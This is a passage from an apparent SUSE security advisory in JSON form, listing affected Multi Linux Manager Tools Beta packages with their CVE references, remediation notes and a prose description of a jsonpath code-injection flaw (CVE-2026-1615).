"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "important"
}
],
"title": "CVE-2025-67726"
},
{
"cve": "CVE-2026-1615",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-1615"
}
],
"notes": [
{
"category": "general",
"text": "Versions of the package jsonpath before 1.2.0 are vulnerable to Arbitrary Code Injection via unsafe evaluation of user-supplied JSON Path expressions. The library relies on the static-eval module to process JSON Path input, which is not designed to handle untrusted data safely. An attacker can exploit this vulnerability by supplying a malicious JSON Path expression that, when evaluated, executes arbitrary JavaScript code, leading to Remote Code Execution in Node.js environments or Cross-site Scripting (XSS) in browser contexts. This affects all methods that evaluate JSON Paths against objects, including .query, .nodes, .paths, .value, .parent, and .apply.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-1615",
"url": "https://www.suse.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "SUSE Bug 1257897 for CVE-2026-1615",
"url": "https://bugzilla.suse.com/1257897"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
